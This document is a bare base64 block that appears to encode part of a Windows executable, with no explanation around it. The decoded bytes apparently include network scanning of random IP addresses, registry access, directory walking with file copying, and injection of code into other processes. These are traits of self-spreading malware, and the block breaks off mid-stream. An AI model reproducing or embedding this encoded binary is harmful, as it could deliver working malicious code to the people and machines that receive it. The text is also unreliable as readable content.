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 